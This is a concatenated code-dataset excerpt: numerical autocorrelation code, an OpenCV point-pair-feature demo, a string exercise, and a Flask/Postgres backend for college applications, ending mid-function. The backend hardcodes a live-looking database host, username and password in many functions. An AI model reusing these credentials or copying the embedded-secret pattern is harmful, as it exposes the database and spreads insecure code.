    acde = acd.std(axis=1)
    n = 1.
    if norm in ("total", "auto"):
        if fdf0 is None:
            # maybe we didn't calculate these yet
            # must match subtract code above!
            fdf0 = funcs[0](df[cols[0]])
            fdf1 = funcs[1](df[cols[1]])
        # from cross covariance to cross correlation
        n = 1./(np.std(fdf0) * np.std(fdf1))
    if discarded_days:
        getLogger(__name__).info(
            "Discarded %i %ss < %i events" % (
                discarded_days, by, events_required
            )
        )
        # re-scale: empty columns were averaged in as zeros above
        n *= len(g) / float(len(g) - discarded_days)
    acdm *= n
    acde *= n
    # done
    if return_df:
        lag = pd.Index(list(range(-maxlag,maxlag+1)), name='lag')
        return pd.DataFrame({
            'xcorr':     xcorrshift(acdm, maxlag),
            'xcorr_std': xcorrshift(acde, maxlag),
        }, index=lag)
    else:
        return acdm, acde
def acorr_grouped_df(
    df,
    col = None,
    by = 'date',
    nfft = 'pad',
    func = lambda x: x,
    subtract_mean = 'total',
    norm = 'total',
    return_df = True,
    debias = True,
    **kwargs
    ):
    """Group dataframe and calc autocorrelation for each group separately.
    Returns: mean and std over groups for positive lags only.
    Parameters:
    ===========
    df: pandas.DataFrame, pandas.Series
        input time series. If by is a string, df must include the column
        for which we calculate the autocorr and the one by which we group.
        If by is a series, df can be a series, too.
    col: str, None [optional]
        column with the time series of interest.
    by: str [optional]
        column by which to group. default: 'date'
    nfft: int, str [optional]
        twice the maximal lag measured. default: 'auto'
        'auto': use smallest group size.
        'auto pad > 100': zero pad to segments of length >= 200,
            skip days with fewer events
    func: function [optional]
        function to apply to col before calculating the autocorr.
        default: identity.
    subtract_mean: str [optional]
        what to subtract from the time series before calculating the
        autocorr.
        'total': subtract mean of the whole series from each group
        'group': subtract group mean from each group
        None: subtract nothing
        default: 'total'
    norm: str [optional]
        default: 'total' (normalise mean response to one at lag zero).
        Other values
    debias: bool [optional]
        True: Correct the bias from zero-padding if applicable (default).
        False: Don't debias.
    **kwargs are passed through. see also: acorr, xcorr, xcorr_grouped_df
    """
    # group, allocate, slice
    g = df.groupby(by)
    if not col:
        if (
            is_string_like(by)
            and hasattr(df, 'columns')
            and by in df.columns
        ):
            # we just got two columns, one is group, so it's clear what to do
            col = list(df.columns)
            col.remove(by)
        elif len(df.shape) > 1:
            # unclear what to do
            raise ValueError
    # determine fft segment size
    nfft, events_required = get_nfft(nfft, g)
    maxlag = int(min(nfft//2, events_required))
    # allocate
    # one column per group; columns of groups that are skipped below stay
    # all-zero and are compensated for in the normalisation step at the end
    acd = np.zeros((maxlag + 1, len(g)))
    # what to subtract
    # NOTE(review): fdf is assigned but never used in this function
    fdf = None
    if subtract_mean in ('total', 'auto'):
        subtract = func(df[col]).mean()
        sm = False
    elif subtract_mean in ('group', 'each', True, by):
        # per-group mean subtraction is delegated to acorr via sm=True
        subtract = 0
        sm = True
    else:
        subtract = 0
        sm = False
    # which norm for each day?
    if norm in ("total", "auto"):
        # calculate covariances for each day, later norm to one giving a corr.
        nd = 'cov'
    else:
        nd = norm
    # do it
    discarded_days = 0
    for i, (gk, gs) in enumerate(g):
        if len(gs) < events_required:
            # this day is too short
            discarded_days += 1
            continue
        else:
            x = np.zeros(maxlag+1)
            # average over minimally overlapping segments
            nit = int(np.ceil(len(gs) / float(nfft)))
            tj = np.unique(np.linspace(0, len(gs)-nfft, nit, dtype=int))
            for j in range(nit):
                x += acorr(
                    func(gs[col][tj[j]:tj[j]+nfft]) - subtract,
                    subtract_mean=sm,
                    norm = nd,
                    nfft = nfft,
                    debias = debias,
                    **kwargs
                )[:maxlag+1]
            acd[:,i] = x / nit
            del x
    # average
    acdm = acd.mean(axis=1)
    acde = acd.std(axis=1)
    n = 1
    if norm in ("total", "auto"):
        # norm to one
        # rescaling by the lag-0 value also absorbs the bias from all-zero
        # columns of discarded groups
        n = 1./acdm[0]
    elif discarded_days:
        # without lag-0 normalisation, correct the mean for the all-zero
        # columns of discarded groups explicitly
        n = len(g) / float(len(g) - discarded_days)
    if discarded_days:
        getLogger(__name__).info(
            "Discarded %i %ss < %i events" % (
                discarded_days, by, events_required
            )
        )
    acdm *= n
    acde *= n
    # done
    if return_df:
        lag = pd.Index(list(range(maxlag+1)), name='lag')
        return pd.DataFrame({
            'acorr': acdm,
            'acorr_std': acde,
        }, index=lag)
    else:
        return acdm, acde
| 0 | 0 | 0 |
31ebe613b5c99ee717124c5b426eb1e60a2277e3 | 938 | py | Python | modules/surface_matching/samples/ppf_load_match.py | ptelang/opencv_contrib | dd68e396c76f1db4d82e5aa7a6545580939f9b9d | [
"Apache-2.0"
] | 7,158 | 2016-07-04T22:19:27.000Z | 2022-03-31T07:54:32.000Z | modules/surface_matching/samples/ppf_load_match.py | ptelang/opencv_contrib | dd68e396c76f1db4d82e5aa7a6545580939f9b9d | [
"Apache-2.0"
] | 2,184 | 2016-07-05T12:04:14.000Z | 2022-03-30T19:10:12.000Z | modules/surface_matching/samples/ppf_load_match.py | ptelang/opencv_contrib | dd68e396c76f1db4d82e5aa7a6545580939f9b9d | [
"Apache-2.0"
] | 5,535 | 2016-07-06T12:01:10.000Z | 2022-03-31T03:13:24.000Z | import cv2 as cv
# Surface-matching demo: detect a 3D model in a scene with Point-Pair
# Features (PPF), then refine the top pose candidates with ICP.
# Number of top pose candidates to refine with ICP.
N = 2
modelname = "parasaurolophus_6700"
scenename = "rs1_normals"
# PPF detector with sampling step 0.025 and distance step 0.05.
detector = cv.ppf_match_3d_PPF3DDetector(0.025, 0.05)
print('Loading model...')
# Second argument 1 presumably requests per-vertex normals — TODO confirm
# against the loadPLYSimple docs.
pc = cv.ppf_match_3d.loadPLYSimple("data/%s.ply" % modelname, 1)
print('Training...')
detector.trainModel(pc)
print('Loading scene...')
pcTest = cv.ppf_match_3d.loadPLYSimple("data/%s.ply" % scenename, 1)
print('Matching...')
results = detector.match(pcTest, 1.0/40.0, 0.05)
print('Performing ICP...')
# ICP with up to 100 iterations, applied to the N best PPF poses.
icp = cv.ppf_match_3d_ICP(100)
_, results = icp.registerModelToScene(pc, pcTest, results[:N])
print("Poses: ")
for i, result in enumerate(results):
    #result.printPose()
    print("\n-- Pose to Model Index %d: NumVotes = %d, Residual = %f\n%s\n" % (result.modelIndex, result.numVotes, result.residual, result.pose))
    if i == 0:
        # Write the model transformed by the best pose for inspection.
        pct = cv.ppf_match_3d.transformPCPose(pc, result.pose)
        cv.ppf_match_3d.writePLY(pct, "%sPCTrans.ply" % modelname)
| 28.424242 | 145 | 0.695096 | import cv2 as cv
# Surface-matching demo (duplicate copy): detect a 3D model in a scene with
# Point-Pair Features (PPF), then refine the top pose candidates with ICP.
# Number of top pose candidates to refine with ICP.
N = 2
modelname = "parasaurolophus_6700"
scenename = "rs1_normals"
# PPF detector with sampling step 0.025 and distance step 0.05.
detector = cv.ppf_match_3d_PPF3DDetector(0.025, 0.05)
print('Loading model...')
# Second argument 1 presumably requests per-vertex normals — TODO confirm
# against the loadPLYSimple docs.
pc = cv.ppf_match_3d.loadPLYSimple("data/%s.ply" % modelname, 1)
print('Training...')
detector.trainModel(pc)
print('Loading scene...')
pcTest = cv.ppf_match_3d.loadPLYSimple("data/%s.ply" % scenename, 1)
print('Matching...')
results = detector.match(pcTest, 1.0/40.0, 0.05)
print('Performing ICP...')
# ICP with up to 100 iterations, applied to the N best PPF poses.
icp = cv.ppf_match_3d_ICP(100)
_, results = icp.registerModelToScene(pc, pcTest, results[:N])
print("Poses: ")
for i, result in enumerate(results):
    #result.printPose()
    print("\n-- Pose to Model Index %d: NumVotes = %d, Residual = %f\n%s\n" % (result.modelIndex, result.numVotes, result.residual, result.pose))
    if i == 0:
        # Write the model transformed by the best pose for inspection.
        pct = cv.ppf_match_3d.transformPCPose(pc, result.pose)
        cv.ppf_match_3d.writePLY(pct, "%sPCTrans.ply" % modelname)
| 0 | 0 | 0 |
fb883d65257d272c5c48ac4e22c85acfe29b1412 | 530 | py | Python | Programming Languages/Python/Theory/100_Python_Challenges/Section_2_String/40. number of occurrences of a sub-string in a given string.py | jaswinder9051998/Resources | fd468af37bf24ca57555d153ee64693c018e822e | [
"MIT"
] | 101 | 2021-12-20T11:57:11.000Z | 2022-03-23T09:49:13.000Z | Programming Languages/Python/Theory/100_Python_Challenges/Section_2_String/40. number of occurrences of a sub-string in a given string.py | Sid-1164/Resources | 3987dcaeddc8825f9bc79609ff26094282b8ece1 | [
"MIT"
] | 4 | 2022-01-12T11:55:56.000Z | 2022-02-12T04:53:33.000Z | Programming Languages/Python/Theory/100_Python_Challenges/Section_2_String/40. number of occurrences of a sub-string in a given string.py | Sid-1164/Resources | 3987dcaeddc8825f9bc79609ff26094282b8ece1 | [
"MIT"
] | 38 | 2022-01-12T11:56:16.000Z | 2022-03-23T10:07:52.000Z | """
Write a function that finds the number of times a sub-string occurs in a given string and
also the position (index number) at which the sub-string is found.
Example:
main_string = 'Let it be, let it be, let it be'
sub_string = 'let it be'
Expected output:
number of times sub-string occurs = 2, position =[11, 22]
""" | 26.5 | 90 | 0.718868 | """
Write a function that finds the number of times a sub-string occurs in a given string and
also the position (index number) at which the sub-string is found.
Example:
main_string = 'Let it be, let it be, let it be'
sub_string = 'let it be'
Expected output:
number of times sub-string occurs = 2, position =[11, 22]
"""
def find_substring(main_string, sub_string):
    """Find every occurrence of *sub_string* in *main_string*.

    Returns a tuple ``(count, positions)`` where ``positions`` lists every
    start index at which *sub_string* occurs (overlapping matches included)
    and ``count == len(positions)``.

    Fix: the original computed the count with ``str.count``, which counts
    only NON-overlapping occurrences, while the position list includes
    overlapping ones — e.g. ('aaa', 'aa') returned the inconsistent
    (1, [0, 1]).  Deriving the count from the positions keeps both in sync.
    """
    # str.startswith(sub, i) tests for a match anchored at index i.
    positions = [i for i in range(len(main_string))
                 if main_string.startswith(sub_string, i)]
    return len(positions), positions
0f2b54f50167602d747ac94e7fd1ca663512b1d1 | 40,062 | py | Python | app.py | CollegeAppIO/CollegeAppIO | 266032ba23e0f758a751f3d9008ce4a54bf5c8c7 | [
"Apache-2.0"
] | 1 | 2018-09-13T02:03:04.000Z | 2018-09-13T02:03:04.000Z | app.py | CollegeAppIO/CollegeAppIO | 266032ba23e0f758a751f3d9008ce4a54bf5c8c7 | [
"Apache-2.0"
] | 5 | 2018-09-30T04:57:45.000Z | 2020-07-07T19:37:20.000Z | app.py | CollegeAppIO/CollegeAppIO | 266032ba23e0f758a751f3d9008ce4a54bf5c8c7 | [
"Apache-2.0"
] | null | null | null | from flask import Flask, request, render_template, redirect
from flask_cors import CORS, cross_origin
from flask_restful import Resource, Api
from json import dumps
from flask_jsonpify import jsonify
import psycopg2
import jinja2
import json, ast
from sendgrid.helpers.mail import *
from flask_mail import Mail, Message
import boto3, botocore
import logistic_reg as model
from werkzeug.utils import secure_filename
from io import BytesIO
import io
import base64
app = Flask(__name__)
api = Api(app)
CORS(app)
#comment
conn, cur = initDB()
import os
@app.route("/")
@app.route("/dbinfo")
api.add_resource(Students, '/students/<id>/<adbool>')
@app.route("/postResponse", methods = ['POST'])
@app.route("/addCollegeQuestions", methods = ['GET'])
@app.route("/removeWatchList", methods = ['GET'])
@app.route("/getWatchList", methods = ['GET'])
@app.route("/addWatchList", methods = ['GET'])
@app.route("/getApplicationPool")
@app.route("/addAdmin", methods = ['POST'])
@app.route("/getQuestions", methods = ['GET'])
@app.route("/getStudentResponse", methods = ['GET'])
@app.route("/getCategories", methods=['GET'])
@app.route("/getData", methods = ['GET'])
@app.route("/getCollegeStatsMajor", methods=['GET'])
@app.route("/getCollegeCountMajor", methods=['GET'])
@app.route("/getCollegeCountSex", methods=['GET'])
@app.route("/getCollegeCountRace", methods=['GET'])
@app.route("/getCollegeStats", methods = ['GET'])
@app.route("/getCollegeInfo", methods = ['GET'])
@app.route("/getColleges", methods = ['GET'])
@app.route("/getrecommendedColleges", methods = ['GET'])
# using SendGrid's Python Library
# https://github.com/sendgrid/sendgrid-python
# import sendgrid
# import os
# from sendgrid.helpers.mail import *
# sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
# from_email = Email("sanatmouli@gmail.com")
# to_email = Email("sanatmouli@gmail.com")
# subject = "Sending with SendGrid is Fun"
# content = Content("text/plain", "and easy to do anywhere, even with Python")
# mail = Mail(from_email, subject, to_email, content)
# response = sg.client.mail.send.post(request_body=mail.get())
# print(response.status_code)
# print(response.body)
# print(response.headers)
@app.route("/sendEmail/<email_id>/<collegename>", methods = ['GET'])
@app.route("/sendEmailtoStudent/<email_id>/<fname>", methods = ['GET'])
#@app.route("/sendEmailAccept/<email_id>/<collegename>/<studentname>", methods = ['GET'])
#@app.route("/sendEmailReject/<email_id>/<collegename>/<studentname>", methods = ['GET'])
@app.route("/sendEmailStatus/<email_id>/<collegename>/<studentid>/<accept_status>", methods = ['GET'])
@app.route("/putStudents", methods = ['POST'])
@app.route("/getStudents/<uid>", methods = ['GET'])
@app.route("/setCollegeDetails/<collegename>", methods = ['POST'])
@app.route("/setCollegeQuestions/<collegename>", methods = ['POST'])
@app.route("/getCollegeName", methods = ['GET'])
@app.route("/getIDType/<sid>", methods=['GET'])
@app.route("/getCollegeNameForUID/<uid>", methods=['GET'])
@app.route("/getStudentsForCollegeName/<collegename>", methods=['GET'])
@app.route("/getListOfAcceptedStudents/<collegename>", methods=['GET'])
@app.route("/getStatsEachStudent", methods=['GET'])
@app.route("/getCollegeStatsEachMajor", methods=['GET'])
@app.route("/postImage", methods=['POST'])
#@cross_origin(origin='http://localhost:4200',headers=['Content-Type','Authorization','Access-Control-Allow-Origin','Access-Control-Allow-Methods'])
if __name__ == '__main__':
conn, cur = initDB()
app.run(debug=True)
| 30.864407 | 249 | 0.683565 | from flask import Flask, request, render_template, redirect
from flask_cors import CORS, cross_origin
from flask_restful import Resource, Api
from json import dumps
from flask_jsonpify import jsonify
import psycopg2
import jinja2
import json, ast
from sendgrid.helpers.mail import *
from flask_mail import Mail, Message
import boto3, botocore
import logistic_reg as model
from werkzeug.utils import secure_filename
from io import BytesIO
import io
import base64
app = Flask(__name__)
api = Api(app)
CORS(app)
#comment
def initDB():
    """Open a fresh connection to the hosted Postgres instance.

    Returns a (connection, cursor) pair; callers are responsible for
    committing and closing.
    """
    # NOTE(review): credentials are hardcoded in source — move to env vars.
    dsn = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
    connection = psycopg2.connect(dsn)
    cursor = connection.cursor()
    print ("Connected!")
    return connection, cursor
conn, cur = initDB()
import os
def initEmailService():
    """Configure Flask-Mail for Gmail over SSL and return the Mail handle.

    Reads MAIL_USERNAME / MAIL_PASSWORD from the process environment.
    """
    settings = {
        'MAIL_SERVER': 'smtp.gmail.com',
        'MAIL_PORT': 465,
        'MAIL_USERNAME': os.environ['MAIL_USERNAME'],
        'MAIL_PASSWORD': os.environ['MAIL_PASSWORD'],
        'MAIL_USE_TLS': False,
        'MAIL_USE_SSL': True,
    }
    app.config.update(settings)
    return Mail(app)
@app.route("/")
def hello():
    """Health-check endpoint for the API root."""
    greeting = "Hello World and DB!!"
    return jsonify(greeting)
@app.route("/dbinfo")
def dbinfo():
    """Debug endpoint: report reprs of a freshly opened connection/cursor."""
    connection, cursor = initDB()
    return jsonify("Con: " + str(connection) + "Curr: " + str(cursor))
class Students(Resource):
    """REST resource that registers a new student or admin id."""

    def get(self, id, adbool):
        # adbool selects the target table: "0" -> students, else -> admin.
        print('id, adbool: ' + id + " " + adbool)
        conn, curr = initDB()
        if int(adbool) == 0:
            query = "INSERT INTO students (studentid) VALUES (%s)"
        else:
            query = "INSERT INTO admin (admin_id) VALUES (%s)"
        curr.execute(query, (id, ))
        conn.commit()
        curr.close()
        return jsonify("OKKK")
api.add_resource(Students, '/students/<id>/<adbool>')
@app.route("/postResponse", methods = ['POST'])
def postResponse():
    """Create or update a student's application for a college.

    Expects a JSON body with 'studentid', 'collegeName', 'appliedStatus'
    and optionally a '||'-delimited 'questions' string and a 'major'.
    Inserts a new current_application row when none exists for the
    (student, college) pair, otherwise updates the existing one.
    Returns the JSON string "200".
    """
    con = None
    try:
        conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
        con = psycopg2.connect(conn_string)
        print ("Connecting to database\n ->%s" % (conn_string))
        # Round-trip through json/ast to obtain a plain dict from the body.
        text = ast.literal_eval(json.dumps(request.get_json()))
        studentid = text['studentid']
        collegeName = text['collegeName']
        questions = []
        if 'questions' in text:
            # Questions arrive as a single '||'-delimited string.
            questions = text['questions'].split("||")
        appliedStatus = text['appliedStatus']
        major = ""
        if 'major' in text:
            major = text['major']
        curs = con.cursor()
        curs2 = con.cursor()
        curs3 = con.cursor()
        collegeN = (collegeName, )
        # Resolve the college name to its id.
        curs.execute("SELECT collegeid FROM COLLEGES WHERE collegename = %s", collegeN)
        result = []
        for row in curs:
            obj = {
                'collegeid' : row
            }
            result.append(obj)
        print result
        # NOTE(review): raises IndexError when the college name is unknown.
        collegeid = result[0]['collegeid']
        results = checkUser(studentid, collegeid)
        print results
        if (len(results) == 0):
            # First submission for this (student, college) pair.
            acceptancestatus = 0
            query = "INSERT INTO current_application (studentid, collegeid, acceptancestatus, questions, appliedStatus, major) VALUES (%s, %s, %s, %s, %s, %s)"
            curs2.execute(query, (studentid, result[0]['collegeid'], acceptancestatus, questions, appliedStatus, major, ))
        else:
            # NOTE(review): `tup` is built but never used below.
            tup = ()
            for i in range(0, len(questions)):
                tup = tup + (questions[i], )
            query_u = "UPDATE current_application SET questions = %s WHERE studentid = %s AND collegeid = %s"
            curs3.execute(query_u, (questions, studentid, collegeid, ))
            query = "UPDATE current_application SET (appliedStatus, major) = (%s, %s) WHERE studentid = %s AND collegeid = %s"
            curs2.execute(query, (appliedStatus, major, studentid, collegeid, ))
        con.commit()
        curs.close()
        curs2.close()
        curs3.close()
        return jsonify("200")
    finally:
        # Always release the connection, even on error.
        if con:
            con.close()
def checkUser(studentid, collegeid):
    """Return applicationid rows for (studentid, collegeid).

    An empty list means the student has no current application for the
    college; a non-empty list means one already exists.
    """
    conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
    con = None
    try :
        con = psycopg2.connect(conn_string)
        print ("Connecting to database\n ->%s" % (conn_string))
        curs1 = con.cursor()
        curs1.execute("SELECT applicationid FROM current_application WHERE collegeid = %s AND studentid = %s", (collegeid, studentid, ))
        results = []
        for rows in curs1:
            objs = {
                'applicationid' : rows
            }
            results.append(objs)
        con.commit()
        curs1.close()
        return results
    finally:
        if con:
            con.close()
@app.route("/addCollegeQuestions", methods = ['GET'])
def addCollegeQuestions():
    """Replace a college's question list from the request headers.

    Reads 'collegeName' and a '||'-delimited 'question' header and stores
    the split list in colleges.questions.  Returns "200".
    """
    conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
    conn = None
    try :
        conn = psycopg2.connect(conn_string)
        print ("Connecting to database\n ->%s" % (conn_string))
        # NOTE(review): curs is opened and closed but never used.
        curs = conn.cursor()
        curs1 = conn.cursor()
        # NOTE(review): college is a 1-tuple used as the parameter value for
        # collegename = %s — verify psycopg2 renders it as intended.
        college = (request.headers.get('collegeName'), )
        question = request.headers.get('question')
        questions = question.split("||")
        query = (questions, college, )
        curs1.execute("UPDATE colleges SET questions = %s WHERE collegename = %s ", query)
        conn.commit()
        curs.close()
        curs1.close()
        response = jsonify("200")
        response.status_code = 200
        return response
    finally:
        if conn:
            conn.close()
@app.route("/removeWatchList", methods = ['GET'])
def removeWatchList():
    """Remove a college from a student's watchlist array.

    Reads 'studentid' and 'collegename' headers.  Returns "200".
    """
    conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
    conn = None
    try :
        conn = psycopg2.connect(conn_string)
        print ("Connecting to database\n ->%s" % (conn_string))
        curs = conn.cursor()
        curs1 = conn.cursor()
        studentid = request.headers.get('studentid')
        college = request.headers.get('collegename')
        studid = (studentid, )
        curs.execute("SELECT watchlist FROM students WHERE studentid = %s", studid)
        result = []
        for row in curs:
            obj = {
                'watchlist': row
            }
            if obj['watchlist'][0] is not None:
                result = obj['watchlist'][0]
        if (len(result) == 0):
            # NOTE(review): this response is overwritten by "200" below, so
            # the "NO WATCHLIST FOUND" message is never returned.
            response = jsonify("NO WATCHLIST FOUND")
        else:
            print college
            query = (college, studentid, )
            print query
            # Postgres array_remove drops the college from the array column.
            curs1.execute("UPDATE students SET watchlist = array_remove(watchlist, %s) WHERE studentid = %s", query)
        conn.commit()
        curs1.close()
        curs.close()
        response = jsonify("200")
        response.status_code = 200
        return response
    finally:
        if conn:
            conn.close()
@app.route("/getWatchList", methods = ['GET'])
def getWatchList():
    """Return the watchlist array for the student given in the headers.

    Responds with a JSON list of college names (empty if none stored).
    """
    conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
    conn = None
    try :
        conn = psycopg2.connect(conn_string)
        print ("Connecting to database\n ->%s" % (conn_string))
        curs = conn.cursor()
        studentid = request.headers.get('studentid')
        studid = (studentid, )
        curs.execute("SELECT watchlist FROM students WHERE studentid = %s", studid)
        result = []
        for row in curs:
            obj = {
                'watchlist': row
            }
            # A NULL column leaves result as the empty list.
            if obj['watchlist'][0] is not None:
                result = obj['watchlist'][0]
        response = jsonify(result)
        response.status_code = 200
        conn.commit()
        curs.close()
        return response
    finally:
        if conn:
            conn.close()
@app.route("/addWatchList", methods = ['GET'])
def addWatchList():
    """Append a college to a student's watchlist array.

    Reads 'collegeName' and 'studentid' headers; creates the array when it
    is empty/NULL, otherwise appends to the existing one.  Returns "200".
    """
    conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
    conn = None
    try :
        conn = psycopg2.connect(conn_string)
        print ("Connecting to database\n ->%s" % (conn_string))
        curs = conn.cursor()
        curs1 = conn.cursor()
        college = request.headers.get('collegeName')
        studentid = request.headers.get('studentid')
        print studentid
        studid = (studentid, )
        curs.execute("SELECT watchlist FROM students WHERE studentid = %s", studid)
        result = []
        for row in curs:
            obj = {
                'watchlist' : row
            }
            if obj['watchlist'][0] is not None:
                result = obj['watchlist'][0]
        print result
        # NOTE(review): both branches run the same UPDATE; only the source
        # list differs (fresh list vs. existing watchlist).
        if (len(result) == 0):
            colleges = []
            colleges.append(college)
            query = (colleges, studentid, )
            curs1.execute("UPDATE students SET watchlist = %s WHERE studentid = %s ", query)
        else:
            colleges = result
            colleges.append(college)
            query = (colleges, studentid, )
            curs1.execute("UPDATE students SET watchlist = %s WHERE studentid = %s ", query)
        conn.commit()
        curs.close()
        curs1.close()
        response = jsonify("200")
        response.status_code = 200
        return response
    finally:
        if conn:
            conn.close()
@app.route("/getApplicationPool")
def getApplicationPool():
    """List pending applicants (acceptancestatus = 0) for a college.

    Reads 'collegeName' from the headers and returns a JSON list of
    {studentid, major, act, sat, gpa} objects.
    """
    conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
    conn = None
    try :
        conn = psycopg2.connect(conn_string)
        print ("Connecting to database\n ->%s" % (conn_string))
        curs = conn.cursor()
        curs1 = conn.cursor()
        collegeName = request.headers.get('collegeName')
        collegeN = (collegeName, )
        curs.execute("SELECT collegeid FROM colleges WHERE collegeName = %s", collegeN)
        result = []
        for row in curs:
            obj = {
                'collegeid' : row
            }
            result.append(obj)
        print result
        # collegeid is the whole 1-tuple row; it doubles as the parameter
        # sequence of the next execute call.
        collegeid = result[0]['collegeid']
        curs1.execute("SELECT students.studentid, major, act, sat, gpa FROM current_application, students WHERE collegeid = %s AND acceptancestatus = 0 AND students.studentid = current_application.studentid", collegeid)
        result = []
        for row in curs1:
            obj = {
                'studentid' : row[0],
                'major' : row[1],
                'act' : row[2],
                'sat' : row[3],
                'gpa' : row[4]
            }
            result.append(obj)
        print result
        response = jsonify(result)
        response.status_code = 200
        conn.commit()
        curs.close()
        curs1.close()
        return response
    finally:
        if conn:
            conn.close()
@app.route("/addAdmin", methods = ['POST'])
def addAdmin():
    """Register an admin user for a college, creating the college if needed.

    Expects a JSON body with 'adminid' and 'collegeName'.  New colleges get
    an id of max(collegeid) + 1.  Returns "Admin User Exists" or
    "Added Admin User".
    """
    conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
    conn = None
    try :
        conn = psycopg2.connect(conn_string)
        print ("Connecting to database\n ->%s" % (conn_string))
        curs1 = conn.cursor()
        text = ast.literal_eval(json.dumps(request.get_json()))
        admin_id = text['adminid']
        collegeName = text['collegeName']
        res = checkAdminUser(admin_id, collegeName)
        res_college = checkCollege(collegeName)
        print res
        response = None
        if (len(res_college) == 0):
            print "College Does Not Exist"
            # Allocate the next collegeid from the current maximum.
            # NOTE(review): max+1 allocation is racy under concurrent requests.
            res_id = getCollegeid()
            collegeid = int(res_id[0]['collegeid'][0]) + 1
            curs1.execute("INSERT INTO colleges (collegeid, collegename) VALUES (%s, %s)", (collegeid, collegeName, ))
        if (len(res) > 0):
            response = jsonify("Admin User Exists")
        else:
            curs1.execute("INSERT INTO admin (admin_id, college) VALUES (%s, %s)", (admin_id, collegeName ))
            response = jsonify("Added Admin User")
        response.status_code = 200
        conn.commit()
        curs1.close()
        return response
    finally:
        if conn:
            conn.close()
def getCollegeid():
    """Return the single highest collegeid as [{'collegeid': <row>}].

    NOTE(review): unlike the route handlers, this helper has no try/finally
    and never closes its connection.
    """
    conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
    con = psycopg2.connect(conn_string)
    print ("Connecting to database\n ->%s" % (conn_string))
    curs1 = con.cursor()
    curs1.execute("SELECT collegeid FROM colleges ORDER BY collegeid DESC LIMIT 1")
    results = []
    for rows in curs1:
        objs = {
            'collegeid' : rows
        }
        results.append(objs)
    print results
    con.commit()
    curs1.close()
    return results
def checkCollege(collegeName):
    """Return matching collegeName rows; empty list means unknown college.

    NOTE(review): the connection is never closed (no try/finally here).
    """
    conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
    con = psycopg2.connect(conn_string)
    print ("Connecting to database\n ->%s" % (conn_string))
    curs1 = con.cursor()
    curs1.execute("SELECT collegeName FROM colleges WHERE collegeName = %s", (collegeName, ))
    results = []
    for rows in curs1:
        objs = {
            'collegeName' : rows
        }
        results.append(objs)
    con.commit()
    curs1.close()
    return results
def checkAdminUser(adminid, collegeName):
    """Return admin name rows for (adminid, collegeName); empty = not found.

    NOTE(review): the connection is never closed (no try/finally here).
    """
    conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
    con = psycopg2.connect(conn_string)
    print ("Connecting to database\n ->%s" % (conn_string))
    curs1 = con.cursor()
    curs1.execute("SELECT admin_fname, admin_lname FROM admin WHERE admin_id = %s AND college = %s", (adminid, collegeName, ))
    results = []
    for rows in curs1:
        objs = {
            'admin_fname' : rows[0],
            'admin_lname' : rows[1]
        }
        results.append(objs)
    con.commit()
    curs1.close()
    return results
@app.route("/getQuestions", methods = ['GET'])
def getQuestions():
    """Return the stored question list for the college in the headers."""
    conn = None
    try:
        conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
        print ("Connecting to database\n ->%s" % (conn_string))
        conn = psycopg2.connect(conn_string)
        curs = conn.cursor()
        collegeName = request.headers.get('collegeName')
        collegeN = (collegeName, )
        curs.execute("SELECT questions FROM colleges WHERE collegeName = %s", collegeN)
        result = []
        for row in curs:
            obj = {
                'questions' : row[0]
            }
            # Each iteration replaces result, so only the last row's
            # questions value is returned.
            result = obj['questions']
        print result
        response = jsonify(result)
        response.status_code = 200
        conn.commit()
        curs.close()
        return response
    finally:
        if conn:
            conn.close()
@app.route("/getStudentResponse", methods = ['GET'])
def getStudentResponse():
    """Return a student's in-progress answers for a college.

    Reads 'studentid' and 'collegeName' headers.  appliedStatus encodes:
    2 = no application row found, 1 = already applied, 0 = draft (returns
    the saved questions and major).
    """
    conn = None
    try:
